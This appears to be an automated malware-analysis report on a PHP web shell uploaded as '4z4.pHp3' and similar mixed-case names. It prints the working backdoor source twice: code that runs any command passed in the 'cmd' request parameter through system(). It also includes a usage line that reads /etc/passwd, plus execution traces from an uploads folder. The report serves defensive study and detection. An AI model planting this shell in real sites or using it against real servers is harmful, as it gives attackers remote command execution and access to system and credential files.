PHP Malware Analysis

4z4.PhP, 4z4.pHp3, 4z4.pHp4

md5: f091d1b9274c881f8e41b2f96e6b9936

Attributes

Execution

URLs


Deobfuscated PHP code

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php 
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}
?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

Execution traces

data/traces/f091d1b9274c881f8e41b2f96e6b9936_trace-1676247942.4424.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:26:08.340236]
1	0	1	0.000191	393512
1	3	0	0.000249	395008	{main}	1		/var/www/html/uploads/4z4.pHp3	0	0
1	3	1	0.000268	395008
			0.000298	314224
TRACE END   [2023-02-12 22:26:08.340380]

data/traces/f091d1b9274c881f8e41b2f96e6b9936_trace-1676249771.0074.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:56:36.905229]
1	0	1	0.000145	393512
1	3	0	0.000199	395008	{main}	1		/var/www/html/uploads/4z4.pHp4	0	0
1	3	1	0.000217	395008
			0.000244	314224
TRACE END   [2023-02-12 22:56:36.905361]

data/traces/f091d1b9274c881f8e41b2f96e6b9936_trace-1676253785.8238.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:03:31.721611]
1	0	1	0.000219	393512
1	3	0	0.000288	395008	{main}	1		/var/www/html/uploads/4z4.PhP	0	0
1	3	1	0.000309	395008
			0.000345	314224
TRACE END   [2023-02-13 00:03:31.721781]


Generated HTML code

<html><head></head><body>Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->
</body></html>

Original PHP code

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->